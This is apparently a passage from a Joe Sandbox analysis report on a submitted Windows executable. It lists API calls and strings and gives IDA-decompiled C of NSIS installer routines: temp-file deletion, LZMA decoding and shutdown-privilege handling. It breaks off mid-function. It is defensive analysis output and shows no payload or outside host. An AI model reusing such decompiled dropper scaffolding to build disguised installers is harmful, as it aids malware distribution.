                                                  0x004034e3
                                                  0x004034e7
                                                  0x004034e8
                                                  0x004034f1
                                                  0x004034ea
                                                  0x004034ea
                                                  0x004034ea
                                                  0x004034f7
                                                  0x004034fd
                                                  0x00403503
                                                  0x0040350b
                                                  0x0040350b
                                                  0x00403519
                                                  0x00403520
                                                  0x00403529
                                                  0x0040352f
                                                  0x0040353b
                                                  0x00403541
                                                  0x0040354b
                                                  0x00403555
                                                  0x0040355b
                                                  0x0040355d
                                                  0x0040355f
                                                  0x00403560
                                                  0x00403561
                                                  0x00403572
                                                  0x00403578
                                                  0x0040357f
                                                  0x00403582
                                                  0x00403588
                                                  0x00403588
                                                  0x0040357f
                                                  0x0040355d
                                                  0x0040358c
                                                  0x00403592
                                                  0x00403592
                                                  0x00403592
                                                  0x00403595
                                                  0x00403596
                                                  0x00403597
                                                  0x00403597
                                                  0x00000000
                                                  0x004034e3
                                                  0x00403444
                                                  0x00403446
                                                  0x00403451
                                                  0x00000000
                                                  0x00000000
                                                  0x00403459
                                                  0x00403464
                                                  0x00403469
                                                  0x00000000
                                                  0x00403469
                                                  0x004033e5
                                                  0x004033f1
                                                  0x004033f6
                                                  0x004033fb
                                                  0x004033fd
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040339a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040334e
                                                  0x0040334e
                                                  0x0040334e
                                                  0x0040334f
                                                  0x0040334f
                                                  0x00000000
                                                  0x0040334e
                                                  0x00000000

                                                  APIs
                                                  • SetErrorMode.KERNELBASE ref: 00403273
                                                  • GetVersion.KERNEL32 ref: 00403279
                                                  • #17.COMCTL32(0000000B,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 004032C7
                                                  • OleInitialize.OLE32(00000000), ref: 004032CE
                                                  • SHGetFileInfoA.SHELL32(0041F538,00000000,?,00000160,00000000), ref: 004032EA
                                                  • GetCommandLineA.KERNEL32(00423780,NSIS Error), ref: 004032FF
                                                  • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Lc8xQv8iZY.exe",00000000), ref: 00403312
                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Lc8xQv8iZY.exe",00409130), ref: 0040333D
                                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033D0
                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033E5
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033F1
                                                  • DeleteFileA.KERNELBASE(1033), ref: 00403404
                                                    • Part of subcall function 00406087: GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
                                                    • Part of subcall function 00406087: GetProcAddress.KERNEL32(00000000,?), ref: 004060B4
                                                  • ExitProcess.KERNEL32(00000000), ref: 0040347D
                                                  • OleUninitialize.OLE32(00000000), ref: 00403482
                                                  • ExitProcess.KERNEL32 ref: 004034A2
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Lc8xQv8iZY.exe",00000000,00000000), ref: 004034B5
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,004091AC,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Lc8xQv8iZY.exe",00000000,00000000), ref: 004034C4
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Lc8xQv8iZY.exe",00000000,00000000), ref: 004034CF
                                                  • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Lc8xQv8iZY.exe",00000000,00000000), ref: 004034DB
                                                  • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004034F7
                                                  • DeleteFileA.KERNEL32(0041F138,0041F138,?,00425000,?), ref: 00403541
                                                  • CopyFileA.KERNEL32(C:\Users\user\Desktop\Lc8xQv8iZY.exe,0041F138,00000001), ref: 00403555
                                                  • CloseHandle.KERNEL32(00000000,0041F138,0041F138,?,0041F138,00000000), ref: 00403582
                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004035DB
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403633
                                                  • ExitProcess.KERNEL32 ref: 00403656
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: ExitFileProcesslstrcat$Handle$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpi
                                                  • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\Lc8xQv8iZY.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Lc8xQv8iZY.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SETUPAPI$SeShutdownPrivilege$USERENV$UXTHEME$\Temp$~nsu
                                                  • API String ID: 2193684524-30258393
                                                  • Opcode ID: 04a921f9e0ed42acd1cb95c7a244a34336158986e025354fe7f9aad2ed634273
                                                  • Instruction ID: fae095d870e6aa7b2133663338cad99947a58f50826f320776521e81424d7011
                                                  • Opcode Fuzzy Hash: 04a921f9e0ed42acd1cb95c7a244a34336158986e025354fe7f9aad2ed634273
                                                  • Instruction Fuzzy Hash: 19A1D370A083417AE7217F619C4AB2B7EAC9B4170AF54053FF881761D2CB7C9E058A6F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 279 405620-40563b call 4058cf 282 405654-40565e 279->282 283 40563d-40564f DeleteFileA 279->283 285 405660-405662 282->285 286 405672-405680 call 405cfb 282->286 284 4057e8-4057eb 283->284 287 405793-405799 285->287 288 405668-40566c 285->288 294 405682-40568d lstrcatA 286->294 295 40568f-405690 call 405835 286->295 287->284 290 40579b-40579e 287->290 288->286 288->287 292 4057a0-4057a6 290->292 293 4057a8-4057b0 call 405ff6 290->293 292->284 293->284 303 4057b2-4057c7 call 4057ee call 4059b3 RemoveDirectoryA 293->303 297 405695-405698 294->297 295->297 300 4056a3-4056a9 lstrcatA 297->300 301 40569a-4056a1 297->301 302 4056ae-4056cc lstrlenA FindFirstFileA 300->302 301->300 301->302 304 4056d2-4056e9 call 405819 302->304 305 405789-40578d 302->305 318 4057e0-4057e3 call 404fe7 303->318 319 4057c9-4057cd 303->319 312 4056f4-4056f7 304->312 313 4056eb-4056ef 304->313 305->287 307 40578f 305->307 307->287 316 4056f9-4056fe 312->316 317 40570a-405718 call 405cfb 312->317 313->312 315 4056f1 313->315 315->312 321 405700-405702 316->321 322 405768-40577a FindNextFileA 316->322 329 40571a-405722 317->329 330 40572f-40573e call 4059b3 DeleteFileA 317->330 318->284 319->292 324 4057cf-4057de call 404fe7 call 405a49 319->324 321->317 325 405704-405708 321->325 322->304 327 405780-405783 FindClose 322->327 324->284 325->317 325->322 327->305 329->322 334 405724-40572d call 405620 329->334 339 405760-405763 call 404fe7 330->339 340 405740-405744 330->340 334->322 339->322 341 405746-405756 call 404fe7 call 405a49 340->341 342 405758-40575e 340->342 341->322 342->322
                                                  C-Code - Quality: 94%
                                                  			E00405620(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				struct _WIN32_FIND_DATAA _v332;
                                                  				signed int _t37;
                                                  				char* _t49;
                                                  				signed int _t52;
                                                  				signed int _t55;
                                                  				signed int _t61;
                                                  				signed int _t63;
                                                  				void* _t65;
                                                  				signed int _t68;
                                                  				CHAR* _t70;
                                                  				CHAR* _t72;
                                                  				char* _t75;
                                                  
                                                  				_t72 = _a4;
                                                  				_t37 = E004058CF(__eflags, _t72);
                                                  				_v12 = _t37;
                                                  				if((_a8 & 0x00000008) != 0) {
                                                  					_t63 = DeleteFileA(_t72); // executed
                                                  					asm("sbb eax, eax");
                                                  					_t65 =  ~_t63 + 1;
                                                  					 *0x424008 =  *0x424008 + _t65;
                                                  					return _t65;
                                                  				}
                                                  				_t68 = _a8 & 0x00000001;
                                                  				__eflags = _t68;
                                                  				_v8 = _t68;
                                                  				if(_t68 == 0) {
                                                  					L5:
                                                  					E00405CFB(0x421588, _t72);
                                                  					__eflags = _t68;
                                                  					if(_t68 == 0) {
                                                  						E00405835(_t72);
                                                  					} else {
                                                  						lstrcatA(0x421588, "\*.*");
                                                  					}
                                                  					__eflags =  *_t72;
                                                  					if( *_t72 != 0) {
                                                  						L10:
                                                  						lstrcatA(_t72, 0x409010);
                                                  						L11:
                                                  						_t70 =  &(_t72[lstrlenA(_t72)]); // executed
                                                  						_t37 = FindFirstFileA(0x421588,  &_v332); // executed
                                                  						__eflags = _t37 - 0xffffffff;
                                                  						_a4 = _t37;
                                                  						if(_t37 == 0xffffffff) {
                                                  							L29:
                                                  							__eflags = _v8;
                                                  							if(_v8 != 0) {
                                                  								_t31 = _t70 - 1;
                                                  								 *_t31 =  *(_t70 - 1) & 0x00000000;
                                                  								__eflags =  *_t31;
                                                  							}
                                                  							goto L31;
                                                  						} else {
                                                  							goto L12;
                                                  						}
                                                  						do {
                                                  							L12:
                                                  							_t75 =  &(_v332.cFileName);
                                                  							_t49 = E00405819( &(_v332.cFileName), 0x3f);
                                                  							__eflags =  *_t49;
                                                  							if( *_t49 != 0) {
                                                  								__eflags = _v332.cAlternateFileName;
                                                  								if(_v332.cAlternateFileName != 0) {
                                                  									_t75 =  &(_v332.cAlternateFileName);
                                                  								}
                                                  							}
                                                  							__eflags =  *_t75 - 0x2e;
                                                  							if( *_t75 != 0x2e) {
                                                  								L19:
                                                  								E00405CFB(_t70, _t75);
                                                  								__eflags = _v332.dwFileAttributes & 0x00000010;
                                                  								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                                                  									E004059B3(_t72);
                                                  									_t52 = DeleteFileA(_t72);
                                                  									__eflags = _t52;
                                                  									if(_t52 != 0) {
                                                  										E00404FE7(0xfffffff2, _t72);
                                                  									} else {
                                                  										__eflags = _a8 & 0x00000004;
                                                  										if((_a8 & 0x00000004) == 0) {
                                                  											 *0x424008 =  *0x424008 + 1;
                                                  										} else {
                                                  											E00404FE7(0xfffffff1, _t72);
                                                  											_push(0);
                                                  											_push(_t72);
                                                  											E00405A49(__eflags);
                                                  										}
                                                  									}
                                                  								} else {
                                                  									__eflags = (_a8 & 0x00000003) - 3;
                                                  									if(__eflags == 0) {
                                                  										E00405620(_t70, __eflags, _t72, _a8);
                                                  									}
                                                  								}
                                                  								goto L27;
                                                  							}
                                                  							_t61 =  *((intOrPtr*)(_t75 + 1));
                                                  							__eflags = _t61;
                                                  							if(_t61 == 0) {
                                                  								goto L27;
                                                  							}
                                                  							__eflags = _t61 - 0x2e;
                                                  							if(_t61 != 0x2e) {
                                                  								goto L19;
                                                  							}
                                                  							__eflags =  *((char*)(_t75 + 2));
                                                  							if( *((char*)(_t75 + 2)) == 0) {
                                                  								goto L27;
                                                  							}
                                                  							goto L19;
                                                  							L27:
                                                  							_t55 = FindNextFileA(_a4,  &_v332); // executed
                                                  							__eflags = _t55;
                                                  						} while (_t55 != 0);
                                                  						_t37 = FindClose(_a4); // executed
                                                  						goto L29;
                                                  					}
                                                  					__eflags =  *0x421588 - 0x5c;
                                                  					if( *0x421588 != 0x5c) {
                                                  						goto L11;
                                                  					}
                                                  					goto L10;
                                                  				} else {
                                                  					__eflags = _t37;
                                                  					if(_t37 == 0) {
                                                  						L31:
                                                  						__eflags = _v8;
                                                  						if(_v8 == 0) {
                                                  							L39:
                                                  							return _t37;
                                                  						}
                                                  						__eflags = _v12;
                                                  						if(_v12 != 0) {
                                                  							_t37 = E00405FF6(_t72);
                                                  							__eflags = _t37;
                                                  							if(_t37 == 0) {
                                                  								goto L39;
                                                  							}
                                                  							E004057EE(_t72);
                                                  							E004059B3(_t72);
                                                  							_t37 = RemoveDirectoryA(_t72); // executed
                                                  							__eflags = _t37;
                                                  							if(_t37 != 0) {
                                                  								return E00404FE7(0xffffffe5, _t72);
                                                  							}
                                                  							__eflags = _a8 & 0x00000004;
                                                  							if((_a8 & 0x00000004) == 0) {
                                                  								goto L33;
                                                  							}
                                                  							E00404FE7(0xfffffff1, _t72);
                                                  							_push(0);
                                                  							_push(_t72);
                                                  							return E00405A49(__eflags);
                                                  						}
                                                  						L33:
                                                  						 *0x424008 =  *0x424008 + 1;
                                                  						return _t37;
                                                  					}
                                                  					__eflags = _a8 & 0x00000002;
                                                  					if((_a8 & 0x00000002) == 0) {
                                                  						goto L31;
                                                  					}
                                                  					goto L5;
                                                  				}
                                                  			}


















                                                  APIs
                                                  • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 0040563E
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaAF60.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsaAF60.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 00405688
                                                  • lstrcatA.KERNEL32(?,00409010,?,C:\Users\user\AppData\Local\Temp\nsaAF60.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 004056A9
                                                  • lstrlenA.KERNEL32(?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsaAF60.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 004056AF
                                                  • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsaAF60.tmp\*.*,?,?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsaAF60.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 004056C0
                                                  • FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 00405772
                                                  • FindClose.KERNELBASE(?), ref: 00405783
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\Lc8xQv8iZY.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsaAF60.tmp\*.*$\*.*
                                                  • API String ID: 2035342205-3874973585
                                                  • Opcode ID: f86e9ddd3e1e879dd2542da8a59e5ce314f469bed3f41f99a782128c1842a273
                                                  • Instruction ID: d22bf5e118ddec5917fccaaf7686bbc93ae223f9f66f108bf4c644a40ea6f6a4
                                                  • Opcode Fuzzy Hash: f86e9ddd3e1e879dd2542da8a59e5ce314f469bed3f41f99a782128c1842a273
                                                  • Instruction Fuzzy Hash: 5C510630404B44A6DB217B218C85BBF7AA8DF92319F14817BF945B61D1C73C4982EE6E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  C-Code - Quality: 98%
                                                  			E00406333() {
                                                  				unsigned short _t531;
                                                  				signed int _t532;
                                                  				void _t533;
                                                  				void* _t534;
                                                  				signed int _t535;
                                                  				signed int _t565;
                                                  				signed int _t568;
                                                  				signed int _t590;
                                                  				signed int* _t607;
                                                  				void* _t614;
                                                  
                                                  				L0:
                                                  				while(1) {
                                                  					L0:
                                                  					if( *(_t614 - 0x40) != 0) {
                                                  						 *(_t614 - 0x34) = 1;
                                                  						 *(_t614 - 0x84) = 7;
                                                  						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                  						L132:
                                                  						 *(_t614 - 0x54) = _t607;
                                                  						L133:
                                                  						_t531 =  *_t607;
                                                  						_t590 = _t531 & 0x0000ffff;
                                                  						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                  						if( *(_t614 - 0xc) >= _t565) {
                                                  							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                  							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                  							 *(_t614 - 0x40) = 1;
                                                  							_t532 = _t531 - (_t531 >> 5);
                                                  							 *_t607 = _t532;
                                                  						} else {
                                                  							 *(_t614 - 0x10) = _t565;
                                                  							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                  							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                  						}
                                                  						if( *(_t614 - 0x10) >= 0x1000000) {
                                                  							L139:
                                                  							_t533 =  *(_t614 - 0x84);
                                                  							L140:
                                                  							 *(_t614 - 0x88) = _t533;
                                                  							goto L1;
                                                  						} else {
                                                  							L137:
                                                  							if( *(_t614 - 0x6c) == 0) {
                                                  								 *(_t614 - 0x88) = 5;
                                                  								goto L170;
                                                  							}
                                                  							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                  							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                  							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                  							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                  							goto L139;
                                                  						}
                                                  					} else {
                                                  						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                  						__esi =  *(__ebp - 0x60);
                                                  						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                  						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                  						__ecx =  *(__ebp - 0x3c);
                                                  						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                  						__ecx =  *(__ebp - 4);
                                                  						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                  						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                  						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  						if( *(__ebp - 0x38) >= 4) {
                                                  							if( *(__ebp - 0x38) >= 0xa) {
                                                  								_t97 = __ebp - 0x38;
                                                  								 *_t97 =  *(__ebp - 0x38) - 6;
                                                  							} else {
                                                  								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                  							}
                                                  						} else {
                                                  							 *(__ebp - 0x38) = 0;
                                                  						}
                                                  						if( *(__ebp - 0x34) == __edx) {
                                                  							__ebx = 0;
                                                  							__ebx = 1;
                                                  							L60:
                                                  							__eax =  *(__ebp - 0x58);
                                                  							__edx = __ebx + __ebx;
                                                  							__ecx =  *(__ebp - 0x10);
                                                  							__esi = __edx + __eax;
                                                  							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                  							__ax =  *__esi;
                                                  							 *(__ebp - 0x54) = __esi;
                                                  							__edi = __ax & 0x0000ffff;
                                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  							if( *(__ebp - 0xc) >= __ecx) {
                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  								__cx = __ax;
                                                  								_t216 = __edx + 1; // 0x1
                                                  								__ebx = _t216;
                                                  								__cx = __ax >> 5;
                                                  								 *__esi = __ax;
                                                  							} else {
                                                  								 *(__ebp - 0x10) = __ecx;
                                                  								0x800 = 0x800 - __edi;
                                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  								__ebx = __ebx + __ebx;
                                                  								 *__esi = __cx;
                                                  							}
                                                  							 *(__ebp - 0x44) = __ebx;
                                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                                  								L59:
                                                  								if(__ebx >= 0x100) {
                                                  									goto L54;
                                                  								}
                                                  								goto L60;
                                                  							} else {
                                                  								L57:
                                                  								if( *(__ebp - 0x6c) == 0) {
                                                  									 *(__ebp - 0x88) = 0xf;
                                                  									goto L170;
                                                  								}
                                                  								__ecx =  *(__ebp - 0x70);
                                                  								__eax =  *(__ebp - 0xc);
                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  								_t202 = __ebp - 0x70;
                                                  								 *_t202 =  *(__ebp - 0x70) + 1;
                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  								goto L59;
                                                  							}
                                                  						} else {
                                                  							__eax =  *(__ebp - 0x14);
                                                  							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  							if(__eax >=  *(__ebp - 0x74)) {
                                                  								__eax = __eax +  *(__ebp - 0x74);
                                                  							}
                                                  							__ecx =  *(__ebp - 8);
                                                  							__ebx = 0;
                                                  							__ebx = 1;
                                                  							__al =  *((intOrPtr*)(__eax + __ecx));
                                                  							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                  							L40:
                                                  							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                  							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                  							__ecx =  *(__ebp - 0x58);
                                                  							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                  							 *(__ebp - 0x48) = __eax;
                                                  							__eax = __eax + 1;
                                                  							__eax = __eax << 8;
                                                  							__eax = __eax + __ebx;
                                                  							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  							__ax =  *__esi;
                                                  							 *(__ebp - 0x54) = __esi;
                                                  							__edx = __ax & 0x0000ffff;
                                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                  							if( *(__ebp - 0xc) >= __ecx) {
                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  								__cx = __ax;
                                                  								 *(__ebp - 0x40) = 1;
                                                  								__cx = __ax >> 5;
                                                  								__ebx = __ebx + __ebx + 1;
                                                  								 *__esi = __ax;
                                                  							} else {
                                                  								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                  								 *(__ebp - 0x10) = __ecx;
                                                  								0x800 = 0x800 - __edx;
                                                  								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                  								__ebx = __ebx + __ebx;
                                                  								 *__esi = __cx;
                                                  							}
                                                  							 *(__ebp - 0x44) = __ebx;
                                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                                  								L38:
                                                  								__eax =  *(__ebp - 0x40);
                                                  								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                  									while(1) {
                                                  										if(__ebx >= 0x100) {
                                                  											break;
                                                  										}
                                                  										__eax =  *(__ebp - 0x58);
                                                  										__edx = __ebx + __ebx;
                                                  										__ecx =  *(__ebp - 0x10);
                                                  										__esi = __edx + __eax;
                                                  										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                  										__ax =  *__esi;
                                                  										 *(__ebp - 0x54) = __esi;
                                                  										__edi = __ax & 0x0000ffff;
                                                  										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  										if( *(__ebp - 0xc) >= __ecx) {
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  											__cx = __ax;
                                                  											_t169 = __edx + 1; // 0x1
                                                  											__ebx = _t169;
                                                  											__cx = __ax >> 5;
                                                  											 *__esi = __ax;
                                                  										} else {
                                                  											 *(__ebp - 0x10) = __ecx;
                                                  											0x800 = 0x800 - __edi;
                                                  											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  											__ebx = __ebx + __ebx;
                                                  											 *__esi = __cx;
                                                  										}
                                                  										 *(__ebp - 0x44) = __ebx;
                                                  										if( *(__ebp - 0x10) < 0x1000000) {
                                                  											L45:
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												 *(__ebp - 0x88) = 0xe;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t155 = __ebp - 0x70;
                                                  											 *_t155 =  *(__ebp - 0x70) + 1;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  										}
                                                  									}
                                                  									L53:
                                                  									_t172 = __ebp - 0x34;
                                                  									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                  									L54:
                                                  									__al =  *(__ebp - 0x44);
                                                  									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                  									L55:
                                                  									if( *(__ebp - 0x64) == 0) {
                                                  										 *(__ebp - 0x88) = 0x1a;
                                                  										goto L170;
                                                  									}
                                                  									__ecx =  *(__ebp - 0x68);
                                                  									__al =  *(__ebp - 0x5c);
                                                  									__edx =  *(__ebp - 8);
                                                  									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                  									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                  									 *( *(__ebp - 0x68)) = __al;
                                                  									__ecx =  *(__ebp - 0x14);
                                                  									 *(__ecx +  *(__ebp - 8)) = __al;
                                                  									__eax = __ecx + 1;
                                                  									__edx = 0;
                                                  									_t191 = __eax %  *(__ebp - 0x74);
                                                  									__eax = __eax /  *(__ebp - 0x74);
                                                  									__edx = _t191;
                                                  									L79:
                                                  									 *(__ebp - 0x14) = __edx;
                                                  									L80:
                                                  									 *(__ebp - 0x88) = 2;
